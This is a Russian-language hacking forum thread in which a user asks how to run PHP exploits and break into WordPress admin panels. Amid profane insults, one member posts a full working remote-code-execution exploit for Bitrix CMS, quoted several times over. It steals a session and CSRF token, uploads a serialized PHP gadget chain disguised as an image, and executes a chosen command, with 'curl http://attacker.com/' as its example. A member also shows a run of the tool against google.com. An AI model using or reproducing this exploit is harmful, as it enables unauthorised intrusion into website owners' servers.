• XSS.stack #1 – первый литературный журнал от юзеров форума

Как использовать PHP эксплойты и где взять информацию о взломе панели Wordpress?

gera133

floppy-диск
Пользователь
Регистрация
04.02.2023
Сообщения
2
Реакции
0
Привет, ранее я обучался любой теме по стратегий "узнал, посмотрел гайды, практикуйся"
Но когда я начал изучать WordPress и как ломать подобные CMS споткнулся об второй этап моей "стратегий".
К примеру, индексирую сайт, знаю версию, знаю имя админа, увидел плагин, нашел эксплоит на exploit-db, а что делать дальше хз.
Вся информация которая мне доступна это гайды индусов на ютубе, хабр и журнал xakep. Брут по словарям и использование гитов 2022 разбиваются об сложный пароль или обновленную версию WP.

Заранее спасибо
upd: даже версия эксплойта для плагина 2019 года:confused:
 
Перелогиниться забыл?
Что ты несешь бл#ть? Я заебался на таких как ты смотреть. Которые срут в каждой теме нихуя ни в чем не разбираясь. Мастера спорта по всем видам спорта бл#ть. зачем ты влез в этот топик? У человека вопрос по запуску сплойтов на пыхе под вп. Ты приходишь и пишешь про кребсов, ты долбаеб или да? Ты если в топик какой то заходишь - отвечай по факту на вопрос, либо не лей воду и иди нахуй. Ясно? Надеюсь да.
 
Что ты несешь бл#ть? Я заебался на таких как ты смотреть. Которые срут в каждой теме нихуя ни в чем не разбираясь. Мастера спорта по всем видам спорта бл#ть. зачем ты влез в этот топик? У человека вопрос по запуску сплойтов на пыхе под вп. Ты приходишь и пишешь про кребсов, ты долбаеб или да? Ты если в топик какой то заходишь - отвечай по факту на вопрос, либо не лей воду и иди нахуй. Ясно? Надеюсь да.
мальчик, там написано не про то как юзать эксплоиты на пхп а про то что все вп обновлены и поэтому сплойты на пхп не работают.
 
сплойты на пхп не работают
Ну я же говорю, мастер спорта по всем видам спорта, нихуя не понимает о чем говорит. Вот это что тогда, объясни мне, и как это запустить?
PHP:
<?php
# <= 20.100.0 [ Start <= Business | CRM (any user) ]

(!isset($argv[3]) ? exit(message('php '.basename(__FILE__).' "https://target-bitrix.com" "system" "curl http://attacker.com/"')) : @list($x, $url, $func, $farg) = $argv);

# get phpsess + csrf
if(!preg_match('#(PHPSESSID=.+;).+\'bitrix_sessid\':\'(.+)\'#Uis', request($url.'/bitrix/tools/composite_data.php'), $matches)) exit(message('composite_data problems')); else message($matches[1].', sessid='.$matches[2]);

# upload default
$body = implode("\r\n", [
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][files][code]"',
    '',
    'default',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][default]"; filename="image.jpg"',
    'Content-Type: image/jpeg',
    '',
    payload($func, $farg),
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[CID]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[packageIndex]"',
    '',
    'pIndex101',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[mode]"',
    '',
    'upload',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="action"',
    '',
    'uploadfile',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="sessid"',
    '',
    $matches[2],
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[filesCount]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx--'
]);

request($url.'/bitrix/tools/html_editor_action.php', $matches[1], $body, 'Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx');

# exec default
message(request($url.'/bitrix/tools/html_editor_action.php', $matches[1], 'bxu_info[packageIndex]=pIndex101&action=uploadfile&bxu_info[mode]=upload&sessid='.$matches[2].'&bxu_info[filesCount]=1&bxu_info[CID]=default%00'));


function request($url, $cookie = '', $post = '', $header = []){
    $header = array_merge([($cookie ? 'Cookie: '.$cookie : '')], (is_string($header) ? [$header] : $header));

    $body = @file_get_contents($url, false, stream_context_create(
                                ['ssl' => [
                                            'verify_peer' => false,
                                            'verify_peer_name' => false,
                                ],
                                'http' =>
                                ['method' => ($post ? 'POST' : 'GET'),
                                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
                                'header' => implode("\r\n", $header),
                                'content' => ($post ? $post : '')
                                ]
                             ])
           );
        
    $header = implode(PHP_EOL, $http_response_header);
  
    return $header.PHP_EOL.PHP_EOL.$body;
}

function payload($func, $farg){
  
    return 'O:27:"Bitrix\Main\ORM\Data\Result":3:{S:12:"\00*\00isSuccess";b:0;S:20:"\00*\00wereErrorsChecked";b:0;S:9:"\00*\00errors";O:27:"Bitrix\Main\Type\Dictionary":1:{S:9:"\00*\00values";a:1:{i:0;O:17:"Bitrix\Main\Error":1:{S:10:"\00*\00message";O:36:"Bitrix\Main\UI\Viewer\ItemAttributes":1:{S:13:"\00*\00attributes";O:29:"Bitrix\Main\DB\ResultIterator":3:{S:38:"\00Bitrix\5CMain\5CDB\5CResultIterator\00counter";i:0;S:42:"\00Bitrix\5CMain\5CDB\5CResultIterator\00currentData";i:0;S:37:"\00Bitrix\5CMain\5CDB\5CResultIterator\00result";O:26:"Bitrix\Main\DB\ArrayResult":2:{S:11:"\00*\00resource";a:1:{i:0;a:2:{i:0;S:'.strlen($farg).':"\\'.implode('\\', str_split(bin2hex($farg), 2)).'";i:1;s:1:"x";}}S:13:"\00*\00converters";a:2:{i:0;S:'.strlen($func).':"\\'.implode('\\', str_split(bin2hex($func), 2)).'";i:1;s:17:"WriteFinalMessage";}}}}}}}}';

}

function message($str){
    print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
?>
 
Ну я же говорю, мастер спорта по всем видам спорта, нихуя не понимает о чем говорит. Вот это что тогда, объясни мне:
PHP:
<?php
# <= 20.100.0 [ Start <= Business | CRM (any user) ]

(!isset($argv[3]) ? exit(message('php '.basename(__FILE__).' "https://target-bitrix.com" "system" "curl http://attacker.com/"')) : @list($x, $url, $func, $farg) = $argv);

# get phpsess + csrf
if(!preg_match('#(PHPSESSID=.+;).+\'bitrix_sessid\':\'(.+)\'#Uis', request($url.'/bitrix/tools/composite_data.php'), $matches)) exit(message('composite_data problems')); else message($matches[1].', sessid='.$matches[2]);

# upload default
$body = implode("\r\n", [
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][files][code]"',
    '',
    'default',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][default]"; filename="image.jpg"',
    'Content-Type: image/jpeg',
    '',
    payload($func, $farg),
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[CID]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[packageIndex]"',
    '',
    'pIndex101',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[mode]"',
    '',
    'upload',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="action"',
    '',
    'uploadfile',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="sessid"',
    '',
    $matches[2],
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[filesCount]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx--'
]);

request($url.'/bitrix/tools/html_editor_action.php', $matches[1], $body, 'Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx');

# exec default
message(request($url.'/bitrix/tools/html_editor_action.php', $matches[1], 'bxu_info[packageIndex]=pIndex101&action=uploadfile&bxu_info[mode]=upload&sessid='.$matches[2].'&bxu_info[filesCount]=1&bxu_info[CID]=default%00'));


function request($url, $cookie = '', $post = '', $header = []){
    $header = array_merge([($cookie ? 'Cookie: '.$cookie : '')], (is_string($header) ? [$header] : $header));

    $body = @file_get_contents($url, false, stream_context_create(
                                ['ssl' => [
                                            'verify_peer' => false,
                                            'verify_peer_name' => false,
                                ],
                                'http' =>
                                ['method' => ($post ? 'POST' : 'GET'),
                                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
                                'header' => implode("\r\n", $header),
                                'content' => ($post ? $post : '')
                                ]
                             ])
           );
        
    $header = implode(PHP_EOL, $http_response_header);
  
    return $header.PHP_EOL.PHP_EOL.$body;
}

function payload($func, $farg){
  
    return 'O:27:"Bitrix\Main\ORM\Data\Result":3:{S:12:"\00*\00isSuccess";b:0;S:20:"\00*\00wereErrorsChecked";b:0;S:9:"\00*\00errors";O:27:"Bitrix\Main\Type\Dictionary":1:{S:9:"\00*\00values";a:1:{i:0;O:17:"Bitrix\Main\Error":1:{S:10:"\00*\00message";O:36:"Bitrix\Main\UI\Viewer\ItemAttributes":1:{S:13:"\00*\00attributes";O:29:"Bitrix\Main\DB\ResultIterator":3:{S:38:"\00Bitrix\5CMain\5CDB\5CResultIterator\00counter";i:0;S:42:"\00Bitrix\5CMain\5CDB\5CResultIterator\00currentData";i:0;S:37:"\00Bitrix\5CMain\5CDB\5CResultIterator\00result";O:26:"Bitrix\Main\DB\ArrayResult":2:{S:11:"\00*\00resource";a:1:{i:0;a:2:{i:0;S:'.strlen($farg).':"\\'.implode('\\', str_split(bin2hex($farg), 2)).'";i:1;s:1:"x";}}S:13:"\00*\00converters";a:2:{i:0;S:'.strlen($func).':"\\'.implode('\\', str_split(bin2hex($func), 2)).'";i:1;s:17:"WriteFinalMessage";}}}}}}}}';

}

function message($str){
    print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
?>
ты не знаешь что это? тебе жена не даёт? он чётко написал что все сплойты что он юзал на пыхе не работают потому что вп обновлена. ты бы бухой не заходил на форум.
 
ты не знаешь что это? тебе жена не даёт? он чётко написал что все сплойты что он юзал на пыхе не работают потому что вп обновлена. ты бы бухой не заходил на форум.
Ты читать умеешь или нет? Заголовок топика: КАК ИСПОЛЬЗОВАТЬ PHP ЭКСПЛОИТЫ.

увидел плагин, нашел эксплоит на exploit-db, а что делать дальше хз.
Он находит эксплоит и просто не знает как его запустить. Глаза разуй.

Отвечай на вопрос: что это и как это запустить?
PHP:
<?php
# <= 20.100.0 [ Start <= Business | CRM (any user) ]

(!isset($argv[3]) ? exit(message('php '.basename(__FILE__).' "https://target-bitrix.com" "system" "curl http://attacker.com/"')) : @list($x, $url, $func, $farg) = $argv);

# get phpsess + csrf
if(!preg_match('#(PHPSESSID=.+;).+\'bitrix_sessid\':\'(.+)\'#Uis', request($url.'/bitrix/tools/composite_data.php'), $matches)) exit(message('composite_data problems')); else message($matches[1].', sessid='.$matches[2]);

# upload default
$body = implode("\r\n", [
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][files][code]"',
    '',
    'default',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][default]"; filename="image.jpg"',
    'Content-Type: image/jpeg',
    '',
    payload($func, $farg),
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[CID]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[packageIndex]"',
    '',
    'pIndex101',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[mode]"',
    '',
    'upload',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="action"',
    '',
    'uploadfile',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="sessid"',
    '',
    $matches[2],
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[filesCount]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx--'
]);

request($url.'/bitrix/tools/html_editor_action.php', $matches[1], $body, 'Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx');

# exec default
message(request($url.'/bitrix/tools/html_editor_action.php', $matches[1], 'bxu_info[packageIndex]=pIndex101&action=uploadfile&bxu_info[mode]=upload&sessid='.$matches[2].'&bxu_info[filesCount]=1&bxu_info[CID]=default%00'));


function request($url, $cookie = '', $post = '', $header = []){
    $header = array_merge([($cookie ? 'Cookie: '.$cookie : '')], (is_string($header) ? [$header] : $header));

    $body = @file_get_contents($url, false, stream_context_create(
                                ['ssl' => [
                                            'verify_peer' => false,
                                            'verify_peer_name' => false,
                                ],
                                'http' =>
                                ['method' => ($post ? 'POST' : 'GET'),
                                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
                                'header' => implode("\r\n", $header),
                                'content' => ($post ? $post : '')
                                ]
                             ])
           );
       
    $header = implode(PHP_EOL, $http_response_header);
 
    return $header.PHP_EOL.PHP_EOL.$body;
}

function payload($func, $farg){
 
    return 'O:27:"Bitrix\Main\ORM\Data\Result":3:{S:12:"\00*\00isSuccess";b:0;S:20:"\00*\00wereErrorsChecked";b:0;S:9:"\00*\00errors";O:27:"Bitrix\Main\Type\Dictionary":1:{S:9:"\00*\00values";a:1:{i:0;O:17:"Bitrix\Main\Error":1:{S:10:"\00*\00message";O:36:"Bitrix\Main\UI\Viewer\ItemAttributes":1:{S:13:"\00*\00attributes";O:29:"Bitrix\Main\DB\ResultIterator":3:{S:38:"\00Bitrix\5CMain\5CDB\5CResultIterator\00counter";i:0;S:42:"\00Bitrix\5CMain\5CDB\5CResultIterator\00currentData";i:0;S:37:"\00Bitrix\5CMain\5CDB\5CResultIterator\00result";O:26:"Bitrix\Main\DB\ArrayResult":2:{S:11:"\00*\00resource";a:1:{i:0;a:2:{i:0;S:'.strlen($farg).':"\\'.implode('\\', str_split(bin2hex($farg), 2)).'";i:1;s:1:"x";}}S:13:"\00*\00converters";a:2:{i:0;S:'.strlen($func).':"\\'.implode('\\', str_split(bin2hex($func), 2)).'";i:1;s:17:"WriteFinalMessage";}}}}}}}}';

}

function message($str){
    print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
?>
 
Последнее редактирование:
Ты читать умеешь или нет? Заголовок топик: КАК ИСПОЛЬЗОВАТЬ PHP ЭКСПЛОИТЫ.


Он находит эксплоит и просто не знает как его запустить. Глаза разуй.

Отвечай на вопрос: что это и как это запустить?
PHP:
<?php
# <= 20.100.0 [ Start <= Business | CRM (any user) ]

(!isset($argv[3]) ? exit(message('php '.basename(__FILE__).' "https://target-bitrix.com" "system" "curl http://attacker.com/"')) : @list($x, $url, $func, $farg) = $argv);

# get phpsess + csrf
if(!preg_match('#(PHPSESSID=.+;).+\'bitrix_sessid\':\'(.+)\'#Uis', request($url.'/bitrix/tools/composite_data.php'), $matches)) exit(message('composite_data problems')); else message($matches[1].', sessid='.$matches[2]);

# upload default
$body = implode("\r\n", [
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][files][code]"',
    '',
    'default',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_files[.][default]"; filename="image.jpg"',
    'Content-Type: image/jpeg',
    '',
    payload($func, $farg),
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[CID]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[packageIndex]"',
    '',
    'pIndex101',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[mode]"',
    '',
    'upload',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="action"',
    '',
    'uploadfile',
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="sessid"',
    '',
    $matches[2],
    '-----------------------------xxxxxxxxxxxx',
    'Content-Disposition: form-data; name="bxu_info[filesCount]"',
    '',
    '1',
    '-----------------------------xxxxxxxxxxxx--'
]);

request($url.'/bitrix/tools/html_editor_action.php', $matches[1], $body, 'Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx');

# exec default
message(request($url.'/bitrix/tools/html_editor_action.php', $matches[1], 'bxu_info[packageIndex]=pIndex101&action=uploadfile&bxu_info[mode]=upload&sessid='.$matches[2].'&bxu_info[filesCount]=1&bxu_info[CID]=default%00'));


function request($url, $cookie = '', $post = '', $header = []){
    $header = array_merge([($cookie ? 'Cookie: '.$cookie : '')], (is_string($header) ? [$header] : $header));

    $body = @file_get_contents($url, false, stream_context_create(
                                ['ssl' => [
                                            'verify_peer' => false,
                                            'verify_peer_name' => false,
                                ],
                                'http' =>
                                ['method' => ($post ? 'POST' : 'GET'),
                                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
                                'header' => implode("\r\n", $header),
                                'content' => ($post ? $post : '')
                                ]
                             ])
           );
       
    $header = implode(PHP_EOL, $http_response_header);
 
    return $header.PHP_EOL.PHP_EOL.$body;
}

function payload($func, $farg){
 
    return 'O:27:"Bitrix\Main\ORM\Data\Result":3:{S:12:"\00*\00isSuccess";b:0;S:20:"\00*\00wereErrorsChecked";b:0;S:9:"\00*\00errors";O:27:"Bitrix\Main\Type\Dictionary":1:{S:9:"\00*\00values";a:1:{i:0;O:17:"Bitrix\Main\Error":1:{S:10:"\00*\00message";O:36:"Bitrix\Main\UI\Viewer\ItemAttributes":1:{S:13:"\00*\00attributes";O:29:"Bitrix\Main\DB\ResultIterator":3:{S:38:"\00Bitrix\5CMain\5CDB\5CResultIterator\00counter";i:0;S:42:"\00Bitrix\5CMain\5CDB\5CResultIterator\00currentData";i:0;S:37:"\00Bitrix\5CMain\5CDB\5CResultIterator\00result";O:26:"Bitrix\Main\DB\ArrayResult":2:{S:11:"\00*\00resource";a:1:{i:0;a:2:{i:0;S:'.strlen($farg).':"\\'.implode('\\', str_split(bin2hex($farg), 2)).'";i:1;s:1:"x";}}S:13:"\00*\00converters";a:2:{i:0;S:'.strlen($func).':"\\'.implode('\\', str_split(bin2hex($func), 2)).'";i:1;s:17:"WriteFinalMessage";}}}}}}}}';

}

function message($str){
    print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
?>
Тот сплойт что ты выложил судя по всему вообще под битрикс, а как запустить пхп сплойт, ты шутишь? тот кто не умеет это делать тот не хакер и даже не скрипт киддис, это даже не защита от дурака, тот кто не умеет это делать просто и есть дурак. а в таком тоне ещё ты разговаривай с мамкой своей, тебе конкретно я обьяснять ничего не буду, такие как ты не должны быть даже скрипт-киддисами.
 
Тот сплойт что ты выложил судя по всему вообще под битрикс, а как запустить пхп сплойт, ты шутишь? тот кто не умеет это делать тот не хакер и даже не скрипт киддис, это даже не защита от дурака, тот кто не умеет это делать просто и есть дурак. а в таком тоне ещё ты разговаривай с мамкой своей, тебе конкретно я обьяснять ничего не буду, такие как ты не должны быть даже скрипт-киддисами.
Все ясно. Долбаеб. Даже строчку из кода не в состоянии переписать для ответа. Вот таких как ты я ненавижу больше всех, льющих воду просто для набива постов. Иди штаны суши, мудила.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
прикиньте есть люди которые не умеют запускать сплойты на пхп)))
И прикинь, это ты! Даун, который не смог переписать вторую строчку из вышеупомянутого кода.
 
Допустим запускать понятно как, cохранил, запустил, а про какой эксплоит речь идет у автора?
Не надо было отвечать, интересно что бы этот недоумок придумал.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
прикиньте есть люди которые не умеют запускать сплойты на пхп)))
такие вот сплойт есть а что с ним делать то, как запустить? лол
Много может быть приколов, иногда с теми-же perl/python ну и php можно туда-же отнести, можно часами боротся с зависимастями и версиями. Все прокленаешь и думаешь, ну вот не зря MSF запилили. А потом уже и с msf сидишь в обнимку и смотришь, что он там и куда шлет через бурп, сайт бажный, а не работает. Видети-ли ssl не учтен итд. Чужей код всегда потемки.
Да хер с ним, давай ТС-у поможем :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Это кстати не правильный ответ ;)
Ну давай поможем твоему суециду, а какой правильный?
 
Ну давай поможем твоему суециду, а какой правильный?
а ты запусти скрипт так как ты написал что его надо запускать и увидишь что нихуя он не сработает ;)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
а ты запусти скрипт так как ты написал что его надо запускать и увидишь что нихуя он не сработает ;)
Не вижу проблемы, просто хост не существующий
Код:
php codex.php https://google.com system curl http://google.com/ 

### composite_data problems ###
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх